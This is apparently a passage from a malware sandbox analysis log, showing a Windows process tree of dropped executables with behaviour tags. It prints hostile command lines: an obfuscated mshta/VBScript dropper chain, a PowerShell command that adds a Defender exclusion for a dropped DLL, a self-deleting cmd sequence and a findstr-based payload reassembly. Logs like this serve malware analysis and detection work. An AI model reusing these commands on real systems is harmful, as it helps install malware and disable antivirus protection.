C:\Users\Admin\Documents\Vlaiw1QOxP2xyB7onsxPGq4k.exe"C:\Users\Admin\Documents\Vlaiw1QOxP2xyB7onsxPGq4k.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 6645⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 6765⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 6445⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 6765⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 10685⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
- Program crash
-
C:\Users\Admin\Documents\_5OZc4nLYgX9IT2a1zDDAjBF.exe"C:\Users\Admin\Documents\_5OZc4nLYgX9IT2a1zDDAjBF.exe"4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\_5OZc4nLYgX9IT2a1zDDAjBF.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\_5OZc4nLYgX9IT2a1zDDAjBF.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\_5OZc4nLYgX9IT2a1zDDAjBF.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\_5OZc4nLYgX9IT2a1zDDAjBF.exe") do taskkill -IM "%~nXW" -f6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXeWO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu97⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f9⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE8⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "_5OZc4nLYgX9IT2a1zDDAjBF.exe" -f7⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\8eqdhFTFfUbNhYygyZmIeg8v.exe"C:\Users\Admin\Documents\8eqdhFTFfUbNhYygyZmIeg8v.exe"4⤵
-
C:\Users\Admin\Documents\8eqdhFTFfUbNhYygyZmIeg8v.exe"C:\Users\Admin\Documents\8eqdhFTFfUbNhYygyZmIeg8v.exe" -q5⤵
-
C:\Users\Admin\Documents\4gt0OVgR76VEN6J4RzE7NZL7.exe"C:\Users\Admin\Documents\4gt0OVgR76VEN6J4RzE7NZL7.exe"4⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\4GT0OV~1.DLL,s C:\Users\Admin\DOCUME~1\4GT0OV~1.EXE5⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\4GT0OV~1.DLL,Dw0Cdg==6⤵
- Checks processor information in registry
- Modifies system certificate store
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\4GT0OV~1.DLL7⤵
-
C:\Users\Admin\Documents\Dy1p0_A7yf7E__PB5TFDm6I9.exe"C:\Users\Admin\Documents\Dy1p0_A7yf7E__PB5TFDm6I9.exe"4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\zihUYffJhyVU5DT9YIToGAck.exe"C:\Users\Admin\Documents\zihUYffJhyVU5DT9YIToGAck.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-O5GLM.tmp\zihUYffJhyVU5DT9YIToGAck.tmp"C:\Users\Admin\AppData\Local\Temp\is-O5GLM.tmp\zihUYffJhyVU5DT9YIToGAck.tmp" /SL5="$20560,138429,56832,C:\Users\Admin\Documents\zihUYffJhyVU5DT9YIToGAck.exe"5⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-4ULHB.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4ULHB.tmp\Setup.exe" /Verysilent6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"7⤵
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629548201 /qn CAMPAIGN=""710"" " CAMPAIGN="710"8⤵
-
C:\Users\Admin\Documents\Y3dp0DoOXQwgkUcZkMM1oR1J.exe"C:\Users\Admin\Documents\Y3dp0DoOXQwgkUcZkMM1oR1J.exe"4⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\Y3dp0DoOXQwgkUcZkMM1oR1J.exe"C:\Users\Admin\Documents\Y3dp0DoOXQwgkUcZkMM1oR1J.exe"5⤵
-
C:\Users\Admin\Documents\Zpv9oGuLq0irt1z3Dy09GNLE.exe"C:\Users\Admin\Documents\Zpv9oGuLq0irt1z3Dy09GNLE.exe"4⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\Zpv9oGuLq0irt1z3Dy09GNLE.exeC:\Users\Admin\Documents\Zpv9oGuLq0irt1z3Dy09GNLE.exe5⤵
-
C:\Users\Admin\Documents\zY9vzMCWwAKcME9k5UgICs9t.exe"C:\Users\Admin\Documents\zY9vzMCWwAKcME9k5UgICs9t.exe"4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\7SfXkOF4pYVqtSw1gYPu9TM6.exe"C:\Users\Admin\Documents\7SfXkOF4pYVqtSw1gYPu9TM6.exe"4⤵
- Loads dropped DLL
-
C:\Users\Admin\Documents\1TsU7XyCbc6_GIz5E0qEjgjc.exe"C:\Users\Admin\Documents\1TsU7XyCbc6_GIz5E0qEjgjc.exe"4⤵
-
C:\Users\Admin\Documents\1TsU7XyCbc6_GIz5E0qEjgjc.exeC:\Users\Admin\Documents\1TsU7XyCbc6_GIz5E0qEjgjc.exe5⤵
-
C:\Users\Admin\Documents\bfoV3w_l3eYtvf_suJYp6Kys.exe"C:\Users\Admin\Documents\bfoV3w_l3eYtvf_suJYp6Kys.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\2492713.exe"C:\Users\Admin\AppData\Roaming\2492713.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\4099138.exe"C:\Users\Admin\AppData\Roaming\4099138.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\4684042.exe"C:\Users\Admin\AppData\Roaming\4684042.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\1700239.exe"C:\Users\Admin\AppData\Roaming\1700239.exe"5⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\Documents\2xJhqbV7AGMYVIT5Wlj8eABz.exe"C:\Users\Admin\Documents\2xJhqbV7AGMYVIT5Wlj8eABz.exe"4⤵
- Loads dropped DLL
-
C:\Users\Admin\Documents\gWbvKgUeUq65ebon4O0hHSuX.exe"C:\Users\Admin\Documents\gWbvKgUeUq65ebon4O0hHSuX.exe"4⤵
-
C:\Users\Admin\Documents\gWbvKgUeUq65ebon4O0hHSuX.exe"C:\Users\Admin\Documents\gWbvKgUeUq65ebon4O0hHSuX.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 7686⤵
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Program crash
- Modifies registry class
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 7646⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 9126⤵
- Program crash
-
C:\Users\Admin\Documents\neGtGmYg2E5m1bFLQTEX0TMN.exe"C:\Users\Admin\Documents\neGtGmYg2E5m1bFLQTEX0TMN.exe"4⤵
-
C:\Users\Admin\Documents\5whapuEleHrHkM3YY_zHWiK8.exe"C:\Users\Admin\Documents\5whapuEleHrHkM3YY_zHWiK8.exe"4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\wUDDLMefT4T5oMq0s2v762Em.exe"C:\Users\Admin\Documents\wUDDLMefT4T5oMq0s2v762Em.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im wUDDLMefT4T5oMq0s2v762Em.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\wUDDLMefT4T5oMq0s2v762Em.exe" & del C:\ProgramData\*.dll & exit5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im wUDDLMefT4T5oMq0s2v762Em.exe /f6⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 66⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\0cec99sYPHC4JtcYL6Dyhoy2.exe"C:\Users\Admin\Documents\0cec99sYPHC4JtcYL6Dyhoy2.exe"4⤵
-
C:\Users\Admin\Documents\0cec99sYPHC4JtcYL6Dyhoy2.exe"C:\Users\Admin\Documents\0cec99sYPHC4JtcYL6Dyhoy2.exe"5⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\rbbh_z4zXeo8LJ6ExhVxi7Dd.exe"C:\Users\Admin\Documents\rbbh_z4zXeo8LJ6ExhVxi7Dd.exe"4⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tmp4250_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp4250_tmp.exe"4⤵
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks5⤵
-
C:\Windows\SysWOW64\cmd.execmd6⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks7⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i7⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i8⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i9⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵
- Modifies Internet Explorer settings
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i28⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i29⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i30⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i31⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i32⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i33⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i34⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i35⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i36⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i37⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i38⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i39⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i40⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i41⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i42⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i43⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i44⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i45⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i46⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i47⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i48⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i49⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i50⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i51⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i52⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i53⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i54⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i55⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i56⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i57⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i58⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i59⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i60⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i61⤵
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i62⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i63⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i64⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i65⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i66⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i67⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i68⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i69⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i70⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i71⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i72⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i73⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i74⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i75⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i76⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i77⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i78⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i79⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i80⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i81⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i82⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i83⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i84⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i85⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i86⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i87⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i88⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i89⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i90⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i91⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i92⤵
-
